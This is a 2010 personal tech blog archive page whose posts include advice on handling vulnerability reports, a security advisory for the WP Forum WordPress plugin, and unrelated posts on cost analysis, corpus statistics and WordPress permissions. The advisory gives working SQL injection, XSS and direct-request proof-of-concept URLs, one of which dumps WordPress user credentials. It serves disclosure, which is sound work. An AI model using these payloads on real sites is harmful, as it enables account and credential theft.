So You Just Received a Vulnerability Report. Now What?

Dec 22nd, 2010

It has come to my attention that there is still at least one group of people that doesn’t know how to responsibly deal with vulnerability reports. No, I’m not talking about the security researchers, the blackhats, or the script kiddies. It’s true that there is already alot of controversy surrounding proper (or responsible) disclosure etiquette, but that doesn’t concern the group I’m referring to right now. I’m talking about the maintainer of the resource that the vulnerability report is for. That means you, project maintainers!

Before Receiving a Report

One of the biggest difficulties I’ve been having lately is finding contact information for a project maintainer or their security contact. On multi-developer projects, there should be at least one person who is responsible for fielding security-related reports that come in. They should have the ability to put fixes for security vulnerabilities on high priority for the developers.

Your security person’s email should be easy to find or guess. For example, Google’s is security@google.com and this address is easy to find. You could also achieve this effect by using support/bug report forums, but be sure that any bug or report marked as security-related should be automatically hidden from public view. Regardless of if you decide to use a dedicated email box/alias or support forums for your security reports, it is most important to make someone responsible for making sure that security reports are reacted to quickly and professionally.

After Receiving a Report

As soon as the first human has eyes on the report, it should be assigned to an individual and a confirmation should be sent to the person who provided it. Here’s is one such confirmation:

Thank you for reporting this to us! We have opened a security investigation to track this issue. The case number for your tracking is MSRC [XXXX]. XXXX is the Security Program Manger assigned to the case and he will be working with you and the Microsoft.com team to investigate the issue. She will be following up with you shortly.

This step is super important because many of the people who take the time to report vulnerabilities to the vendor are only just waiting to release the report to the public. You don’t want to still be working on the fix when the news of your project’s security flaw is released.

Once you have a someone assigned to the bug, have them send a brief introduction. I never received my introduction from “XXXX” above, so I sent another email inquiring on the status of the bug. Here is the response:

Thank you very much for your message! My name is YYYY and I have taken over this case from XXXX. Earlier this week, the online services team has started testing a fix for the original issue you have reported, and we are currently verifying this, which includes variation testing and a review of the whole page. The added details you have provided to us in the below message will certainly help us in this process, so thanks a lot!

I will contact you as soon as the fix is deployed, and of course, if you have any further information or questions, please don’t hesitate to let us know.

This email is short, brief, yet contains all the information I would ever want to know. In particular it includes:

An actual person I can continue to provide information to
The status of the vulnerability/bug
The next step(s) in their review process
When I can expect to hear from them next

Just like the MSRC said I would, I heard from them when the fix made it to production. (In case you were wondering, it was 5 calendar days later.) At this point, they made arrangements to acknowledge me on the “Security Researchers Acknowledgment” page. While this is certainly a nice perk, you don’t have to do this.

A valid question at this point is “How long do I have to fix this vulnerability?”

It depends, but as the vendor that’s up for you to figure out. If you’re receiving a vulnerability report from a non-public source, then consider yourself lucky. The person reporting the vulnerability likely believes in responsible disclosure (inherent of the fact that you got the report first) and will be willing to negotiate on the timeline. Be honest with this person. I once waited two months to report a minor SQL injection vulnerability in a trivial web application because the (sole) project maintainer was on vacation when I emailed him initially.

Summary (tl;dr)

Many of the security researchers who will reach out to you believe in responsible (but full) disclosure. That means that your project’s security flaws will make it to the public sooner or later. To ensure the best experience for your users and the preservation of your project’s reputation, you need to handle your vulnerability reports quickly and properly. That means:

Making it easy to find out where to send vulnerability reports to
Communicating with the source of the report to confirm receipt of their report
Communicating with the source of the report your intentions for their report
- Who did the vulnerability get assigned to?
- What is the status of this vulnerability?
- What are the next steps in the review process for this vulnerability?
- When they can expect to hear from you next
Communicating with the source when you believe the vulnerability is fixed

What is all boils down to is this: React quickly and keep open lines of communication between your project and the security researcher who took the time to report a vulnerability to you. If you do this, you’ll minimize the damage to your user base and your reputation.

Finding Web Vulnerabilities

Dec 21st, 2010

At the NESIT Hackathon on Saturday, I was talking to a group of people about discovering web vulnerabilities and I was asked “Which scanner or tools do you use?” The absolute shortest answer I can provide is “I don’t use a scanner.” Despite the lack of a vuln scanner in my toolset, I am still able to consistently find vulnerabilities in web applications. Here’s how:

I first begin by finding or setting up an adequate test environment. If the project is freely available (aka open source/free software,) I set up a test environment. If the project is not freely available, then I look for a site that uses the platform or application I’m trying to audit. I don’t normally recommend the latter case, but if I’m testing a 3rd party web service then I don’t have any other choice.
I then get familiar with the application. What does it do? What problem does it try to solve? What does a normal use case look like?
Then I get really, really familiar with the application. In this stage, I’m really interested in the lesser-used functionality (such as error handling) and making things break. How does the application handle errors? How verbose are the error messages? Are any pages particularly slower than the others? Where does the application get most of its data? Request variables? Cookies? A database? A third party API?I usually do this step with the Firebug plugin for Firefox. I want to know exactly what parameters are being passed to the application, how those variables are being handled, and if (and how) those variables are being spit back out to the user.
My secret weapon is not being afraid to look through the code, if it’s available. If the code is lengthy and I just want to take a cursory glance at it, I grep for “red flags.” Because most vulnerabilities are the result of unescaped, unsanitized user-input, these red flags are usually connected to user-provided variables. For example, If I’m auditing PHP scripts for vulnerabilities, I look for code referencing the $_GET, $_POST, $_REQUEST, and $_COOKIE variables. This step does wonders for finding Cross-Site Scripting and SQL injection vulnerabilities.
In very small projects, like WordPress plugins, I’ll read through each file and try to figure out what story the code is telling. This is very much like reading a short story. I want to know what the application is trying to do.
I’ll then read the code more in-depth. This is akin to analyzing poetry in a Literature class. Things like the actual names of variables and the syntax become much more important here. Now I want to know what the application is actually doing. I recently discovered Cross-Site Scripting SQL injection vulnerabilities in an URL field of an application that was trying to escape it’s input. The problem, however, was that the application was validating and sanitizing $url_var when the value of their user-input was $var_url. The combination of the lack of testing and the lack of error reporting allowed this bug to be introduced into production which created XSS and SQL injection vulnerabilities. Being able to read the code helps find other issues such as direct-request (authentication/authorization bypass) vulnerabilities.
I can’t stress bug/vulnerability hunting outside the normal execution paths of any given application. If a blog platform seems pretty solid, try exploiting its dynamically-generated RSS feed. If a 3rd party web-service looks perfect, try exploiting its support forums or its help site in a different language or character set. Think outside of the box. That phrase is cliche, but it’s cliche for a reason.

Multiple Vulnerabilities in WP Forum (WordPress Plugin)

Dec 17th, 2010

Multiple Vulnerabilities in WP Forum (WordPress Plugin)

1. Advisory Information

Title: Multiple Vulnerabilities in WP-Forum
Advisory URL: http://www.charleshooper.net/blog/multiple-vulnerabilities-in-wp-forum-wordpress-plugin/
Date Published: 12/17/2010
Vendors Contacted: WordPress. Maintainer of plugin is unreachable.

2. Summary

WP Forum is a plugin for the popular blog tool and publishing platform, WordPress.
The author of WP Forum describes it as a “Simple discussion forum plugin” and
“easy to use and administer.”

There exist multiple vulnerabilities in WP Forum. Basically, input validation is not
performed at all resulting in SQL injection, stored XSS, and reflected XSS vulns.

Furthermore, the author wrote the plugin under the assumption that it would only be
executed within the context of the WordPress administrative panel, thereby neglecting
to perform proper authentication and authorization.

3. Vulnerability Information

Packages/Versions Affected: Probably all, but confirmed only on WP Forum 1.7.8

3a. Type: SQL Injection [CWE-89]
3a. Impact: Read application data, bypass protection mechanism,
modify application data. There are multiple SQL injections present
in WP Forum. The most prominent of which is the SQL injection present
in the `group_login` functionality. Prior to logging in, an attacker
can retrieve each group’s passwords due to the vulnerability listed
below (3b).

3b. Type: Plaintext Storage of a Password [CWE-256]
3b. Impact: Password is easily retrieved from database

3c. Type: XSS (Stored or Reflected) [CWE-79]
3c. Impact: Execute unauthorized code or commands

3d. Type: Auth Bypass via Direct Request [CWE-425]
3d. Impact: Many or all of the administrative functions assume they are running
in the context of the WordPress administrative section. As a result,
they often do not check that the user is authenticated or authorized
to perform a particular action. Example functionality includes adding
or removing forum moderators and deleting forums. This vulnerability
could lead to information exposure, privilege escalation, or data loss.

3e. Type: Information Exposure Through Sent Data [CWE-201]
3e. Impact: `sendmail.php` discloses users’ email addresses by accepting a user-
provider “user” variable and returns a hidden tag containing
that user’s email address.

3f. Type: External Control of Assumed-Immutable Web Parameter [CWE-472]
3f. Impact: `sendmail.php` accepts user-provided input allowing it to be used as
an email relay

4. PoC & Technical Description

Due to the number of vulnerabilities in this package, I will not discuss each one
individually. Instead, here are some sample POCs. Many more exploitable vulns exist
in this package than what I am providing here.

4a. http://path.to/wordpress/?page_id=&forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
or (goes for all POCs): http://path.to/wordpress/?forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
4b. N/A
4c. http://path.to/wordpress/?forumaction=group_login&group_id=alert(document.cookie);
4d. http://path.to/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=&groupname=&passwd=
4e. http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php?user= (email address will be in HTML source)
4f. POST ‘submit=true&sender=&email=&message=&subject=&replyto=
to http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php (untested)

5. Report Timeline

12/10/2010 Initial email sent to WordPress security.
12/10/2010 Maintainer not yet contacted as project appears abandoned and maintainer
does not have listed contact information.
12/17/2010 No reply from WordPress security. Advisory released.

6. References

6a. The WordPress Plugin page for WP Forum:

http://wordpress.org/extend/plugins/wpforum/

6b. The WordPress Profile page for the author of the plugin:

http://profiles.wordpress.org/users/fahlstad/

6c. The plugin author’s website:

http://www.fahlstad.se/

7. Legalese

This vulnerability report by Charles Hooper < chooper@plumata.com > is
licensed under a Creative Commons Attribution-NonCommercial-ShareAlike
3.0 Unported License.

8. Signature

Public Key: Obtainable via pool.sks-keyservers.net

Cost Behavior Analysis Calculator

Nov 8th, 2010

One of the projects I’ve been working on lately is my Cost Behavior Analysis Calculator.

Cost behavior analysis is the process of dividing a mixed cost into its variable and fixed components. Doing this can be a long and tedious process. This process, when done manually, involves:

Determining which metric or activity drives costs. A common example in manufacturing is “machine hours.” Using this technique, you could determine how much each “machine hour” affects your power bill.
Making a scatter graph of your data. When you’re plotting your data, what you’re looking for is that a linear relationship exists between your cost driver and your costs. If a linear relationship doesn’t exist, then it isn’t a cost driver – pick a new metric and try again.
Fitting a line to the scatter graph. When working on paper, it’s easier to use the high-low method. However, this method is considered inaccurate as it only uses two points from your entire data set. Not to mention, the highest and lowest points of these data sets are usually considered “atypical.” The Cost Behavior Analyzer uses least-squares regression to fit a more accurate line.
Measure your slope and y-intercept. The slope of the line is your variable cost and the y-intercept is your fixed cost.

I developed the Cost Behavior Analyzer because I found that doing this work manually was tedious and repetitive. I’m making it available here so others can benefit from its use. Managerial accountants, financiers, business owners, and entrepreneurs alike should all know what’s driving their costs and how to accurately predict them.

Try the Cost Behavior Analyzer out now!

Twitter vs Erotica: Your Corpora’s Source Matters

Oct 30th, 2010

Dictionary © uair01; some rights reserved.

As a result of my now defunct project, BookSuggest, I’ve built a fairly large corpus that has been seeded entirely from Twitter. This corpus weighs in at:

16,680,000 documents (tweets)
1,970,165 unique (stemmed) words
(Red flag: Oxford Dictionary suggests there’s an estimated 250,000 words in the English language. This discrepancy is the result of my failure to filter Tweets based on language, the fact that usernames were included in the count, and the fact that people “make words up.” Also, “haha” becomes one word while “hahahaha” becomes another.)
83,758,872 words total.

When I look at these numbers, I often think about how the source documents a corpus/histogram is derived from affects the distribution of its term frequencies. The most obvious example is language. A French corpus will never come close to an English corpus. A less obvious example is subject matter. For example, a corpus derived from English literature will have a different term distribution than a corpus derived from an English medical journal. Common terms will have similar frequencies, but there will be biases towards terms that are domain-specific.

To demonstrate, I scraped the “Erotica” section of textfiles.com and built a corpus based on the data there. The resulting corpus is composed of:

4,337 documents
50,709 unique (stemmed) words
10,413,715 words total.

Notes on Term Counting

Words that had a length of less than 4 characters were discarded
Words were then stemmed using the Porter Stemming algorithm
There may be some slight differences between how words were counted in both corpora, based on minor programming differences

The Data

Finally, here are the term frequencies with the obvious domain-specific terms in bold:

Corpus Seeded from Twitter

![Counts of Top 20 Terms from Twitter Corpus][6]

that (0.84%)
just (0.70%)
with (0.69%)
thi (0.68%)
have (0.65%)
your (0.61%)
like (0.56%)
love (0.54%)
follow (0.45%)
what (0.44%)
from (0.36%)
haha (0.35%)
good (0.34%)
para (0.34%)
will (0.32%)
when (0.30%)
know (0.30%)
want (0.30%)
about 0.30%)
make (0.30%)

Corpus Seeded from Erotica

![Counts of Top 20 Terms from Erotica Corpus][7]

that (1.83%)
with (1.42%)
into (0.76%)
down (0.70%)
then (0.66%)
back (0.66%)
from (0.65%)
thi (0.65%)
hand (0.64%)
were (0.59%)
look (0.58%)
have (0.58%)
cock (0.57%)
like (0.57%)
over (0.57%)
thei (0.56%)
your (0.56%)
what (0.55%)
said (0.55%)
could (0.54%)

You’ll note that the Twitter corpus had a heavy bias towards the term “follow” whereas the Erotica corpus shows an overwhelming use of the term “cock” (Writers: Use synonyms.)

[6]: http://chart.apis.google.com/chart?chxl=0:

that

just

with

thi

have

your

love

what

from

haha

good

para

will

when

know

want

about

make&chxr=0,0,703297&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=4D89F9&chds=0,703297&chd=t:703297,582988,581346,573197,547218,513823,467673,455264,378187,367112,302254,296974,286671,283887,272176,254419,252303,251673,251325,248572&chtt=Counts of Top 20 Terms from Twitter Corpus

[7]: http://chart.apis.google.com/chart?chxl=0:

that

with

into

down

then

back

from

thi

hand

were

look

have

cock

over

thei

your

what

said

could&chxr=0,0,190543&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=F889F9&chds=0,190543&chd=t:190543,148204,78688,72452,69045,68642,68164,67998,66826,61787,60236,60179,59622,59357,58856,58760,57851,57670,57348,55739&chtt=Counts of Top 20 Terms from Erotica Corpus

Practical Reasons Why This Is Important

This is important because if I were to build a domain-specific search-engine, I would be better off seeding my corpus from domain-specific content. If I don’t, my relevance (tf-idf) scores will be inaccurate. For example, an Erotica-specific search engine should decrease the weight for the term “cock” strictly because it has a very high document frequency and is therefore less-significant. Meanwhile, a Twitter-specific search engine should discount the weight of “follow.”

Conclusion

To conclude, the subject matter of a document set will create a bias towards domain-specific terms in the document set’s histogram of term frequencies. If you are calculating relevance for any particular document set, you should use a corpus derived from that document set. In other words, if you can, try not to re-use your corpora!

WordPress Auto Upgrade and “Dumb” Permissions

Oct 29th, 2010

One of the nice features about WordPress is its ability to upgrade and install plugins on the fly. This is nice because now you don’t need to be bothered with the hassle of downloading plugins, unzipping their contents, and transferring them to your web server.

Unfortunately, the way in which WordPress determines if it has the appropriate permissions to upgrade plugins is implemented poorly. When WordPress doesn’t think it has permission, the admin panel will instead prompt you for FTP login information. This is a problem because sometimes WordPress will do this falsely even if it does have proper permissions.

The Problem

The way WordPress tries to guess if it has proper permissions is very primitive. Instead of using PHP’s is_writable, WordPress instead compares the web server’s User ID with the User ID of the wp-content directory’s owner*. While this might work for a large number of cases, it doesn’t work in all of them (including mine).

* It’s actually slightly more complicated than this, but the effect is the same.

The Environment

I run WordPress 3.x on Ubuntu 10.04 LTS under Lighttpd and PHP5-cgi. Lighttpd runs as user www-data and group www-data. If I wanted to let WordPress’ auto-detection of permissions work, I would have to change the owner of my website directories to www-data. This doesn’t fly with me, because I also want my user to have easy access to my document root and don’t like the idea of my data being user-owned by my webserver user.

The Solution

Instead of bending over to WordPress’ permission issues, I was able to perform the following simple steps to have auto-installing/updating plugins and themes *without *changing user ownership of my web files.

sudo chgrp -R www-data /path/to/wp/wp-content

This changes group ownership of wp-content and all sub-directories to be group-owned by your webserver user. wp-content is where WordPress stores plugins, themes, cache files, and (AFAIK) file uploads.
sudo chmod -R g+w /path/to/wp/wp-content

This makes wp-content and all of its sub-directories group-writable.
sudo chmod g+s /path/to/wp/wp-content

This, g+s, is known as setgid. This causes newly-created files to be group-owned by wp-content’s owning group, in this case www-data.
Finally, add the following to the bottom of wp-config.php. This is an override built into the WordPress code. For more information, take a look at wp-admin/includes/file.php’s function get_filesystem_method.

Enable direct file updating in wp-config.php

/* Force direct file updating
- http://www.charleshooper.net/blog/wordpress-auto-upgrade-and-dumb-permissions/
*/
define('FS_METHOD', 'direct');

So there you have it. WordPress does a poor job of properly detecting file permissions and, in some cases, needs to be overridden. If you’re still having problems after this, let me know and I will do my best to help you.

RIP BookSuggest

Oct 26th, 2010

BookSuggest, the web-based book recommendation engine, is officially dead. I’ve been treating BookSuggest as the lowest of priorities for quite some time now and I’m more than happy to declare this project a failure. Here is a brief recap of BookSuggest’s history.

Before BookSuggest was a web application, I used to spam unsuspecting Twitter users with book recommendations. Eventually, Twitter stepped up their anti-spam stance and suspended my spam account. I retired the project for a while until one day I decided to build a web application around the recommendation technology I was using.

This technology was simply scoring words in a user’s timeline, taking the four highest-scoring words, and then passing them to an Amazon ItemSearch query. More specifically, the type of search in use was what Amazon calls a TextStream search. This search method is what allowed me to get book recommendations, even if the search terms provided weren’t all that great. Without it, it’s not unlikely that my ItemSearches wouldn’t return any results at all.

So imagine my surprise when I read the following in Amazon’s API documentation:

Due to low usage, the Product Advertising API operations and response groups listed below will not be supported after October 15, 2010:

…
Additionally, due to low usage, we will be discontinuing Multiple Operation Requests and the TextStream search parameter.

Oh, shoot!

Financially, it makes sense for me to cut my losses here. Back when I was still spamming Twitter, I was pulling over $100/mo. Through the web-app, my referral fees are much smaller. As of this moment, I have a balance of just $9 with Amazon and haven’t cashed out since the start of the project.

Some numbers:

Unique Twitter users: 393
Recommendations made: 611
Documents in corpus: 17,458,549
Unique words in corpus: 1,970,165
Top 5 words in corpus: that, just, with, this, have

RIP BookSuggest!

Code Responsibly: What’s Best for Your Clients?

Oct 23rd, 2010

We programmers have a natural affinity for writing and using our own code. You can’t really blame us; this is akin to gardeners who prefer to eat vegetables they grow, or brewers who prefer to drink their own beer. However, this oftentimes leads to a frequent re-invention of the wheel. While this isn’t always a bad thing, it doesn’t usually benefit our clients and here’s why:

**Increased development time. **If a client is paying you hourly, why should they pay for you to re-invent a solution that already exists? Why write a new CMS if WordPress will do? When you write a new CMS from scratch for a client, you are increasing their development costs.
**Freedom in hosting. **It’s no coincidence that many web developers also host their projects as well. This is fine for larger applications, but for the majority of the client work out there your clients should have the freedom to a broad range of hosting options. Vendor lock-in is a terrible thing.
**Post-development support. **If a client needs customizations done to the code base, they should be able to solicit the work from almost any developer. Certainly you would want preference in these solicitations, but there shouldn’t be any clients who are stuck with you. When you use your own custom solution, you are increasing your clients’ maintenance costs.

I’m not saying that you shouldn’t ever write new code. What I am saying is that your responsibility to the client is to use the best tools for the job and to put together the best solution for them that you can. Sometimes this means flexing your coding muscles and sometimes this means humbly setting up existing software such as WordPress. So please, write new code conservatively and responsibly.

Validating Data With New-Style Classes in Python

Oct 11th, 2010

Every once in awhile in my reading I come across a minor reference to what pythonistas refer to as new-style classes. One of the nice things about new-style classes is the `property` decorators. These property decorators allow you to build getter and setter methods to access object attributes. This is pretty awesome because now you can perform validation at the model/class level whenever you assign a value to a property of an object.

e.g., In one of my projects, I have an attribute named timestamp that takes a `datetime` object. I was concerned about receiving incorrect types from my input because there are alot of ways a programmer can represent the concept of time. Some realistic possibilities of invalid types in my case are:

`time` objects from the time module
`string` objects that contain the date and time (and various possible formats)
`float` or `int` objects that contain a unix timestamp

With a setter method, you can test that the new value being assigned to an attribute is the correct type before assigning it. You can also throw an exception if it’s not. In other words, you can do something like this:

from datetime import datetime

class SomeObject(object):    # new-style classes must be subclassed from object
    _timestamp = None

    @property
    def timestamp(self):
        return self._timestamp

    @timestamp.setter    # the prefix must match the read-only getter func name
    def timestamp(self,value):    # the func name must match the read-only getter func name
        if not isinstance(value, datetime):
            raise ValueError(“Timestamp can only be an instance of Datetime”)
        self._timestamp = value

Go ahead and try it!

The HN Effect in Numbers

Aug 24th, 2010

For the unfamiliar, I wrote an article about a week and a half ago titled How I Made Money Spamming Twitter with Contextual Book Suggestions and promised that I would follow up with a post on the type of traffic I received. Not only did the article get to be pretty popular with the Hacker News crowd, republished in Silicon Alley Insider, and make me the recipient of a handful of wonderful emails but I even got to visit tracked.com’s engineering team and get schooled on machine learning techniques and A.I. (hi folks!) Something relevant I should mention is that, just a day before, I had migrated my Posterous blog from one domain to its current place, blog.charleshooper.net. To anyone who’s curious, this was a totally painless process. Set up DNS first, update your Posterous settings, and set up 302 redirects so your links don’t break. Social Link-Sharing
Despite finishing my article at 1:00 AM, I thought it was pretty well-written and I wanted my story to be heard, so I decided to get a full night’s sleep, proof-read it in the morning, and submit the link to Reddit, Digg, and Hacker News. Besides the obvious benefits of proof-reading the article while fully-rested, I also recognized that most link-sharing sites weight votes based on time (or rather, some product of votes/time maybe) so submitting my article in the morning meant that it would first show up at the beginning of what I believe to be peak usage. So how’d I do? Reddit hated it.

Digg didn’t care.
And Hacker News loved it!
I also make use of Posterous’ “autopost” features and have all my new submissions get posted to Twitter and Facebook. According to Posterous, there were over 77 retweets of my article (most likely from the tweet storm that the Silicon Alley Insider bot and HN bots started) and 7 “likes” on Facebook. Traffic
According to Google Analytics, I’m not very popular. Before publishing my article, I received an average of about 30 visits a day. On the day I published my article, I observed a surge of over 4,600 visitors. From there, the numbers declined daily at a rate that looks very much like exponential decay. It took 10 days for my traffic to return to normal, but that day was a Sunday and the following Monday was almost twice as high (62 visits). For the number geeks, the set of numbers beginning with the peak is (4652, 2688, 1065, 452, 206, 138, 105). I got close with the expression f(x) = 4652e^(-0.6x) but that isn’t quite right (maybe I should treat my average visits as a constant.) Update: I’ve gotten much closer with f(x) = 2658e^(-0.94x) 30

Over the time period, my article received over 9,000 unique page views with a bounce rate of over 90% (~93% exit rate.) I remember reading an article a little while ago that stated, on single-page use cases, the bounce rate will always be close to the exit rate unless the analytics software “phones in” after some period of time to register the visit as something other than a bounce. I use Google Analytics and, unless I find out otherwise, I don’t think it does this (although, it does measure “time on page” so maybe it does and Google’s idea of a bounce is different than mine.)

Sources
My largest source of traffic was referring websites making up over 70% of it. Less than 2% was from search engines and I don’t even think that any of it was destined for my article.
As for the referring websites, I received traffic from all over. However, most of it was from Hacker News, TechMeme.com, and Google.com. I looked into “google.com / referral” versus “google.com / organic” and the referrals mostly consisted of visitors using Google Reader. What isn’t shown below is the 113 other referring sites. The “daemonology.net” referral is a result of HN Daily. As you can see, my top sources are primarily seeded by social media and social link-sharing websites.
Conclusion
To conclude, don’t under-value the social sites. If you want some organic link juice then utilize the “chatty” sites like Facebook and Twitter as well as the link-sharing sites such as Hacker News, Reddit, and Digg. There is a hidden benefit to putting yourself out there and asking for alot of attention: You will ensure that your articles, blog posts, and research are high-quality resources of useful information. Essentially, you end up treating each blog post as you would any startup. Experiment first. Create value second. The rest (profit, respect, esteem) comes easy.

← Older Blog Archives Newer →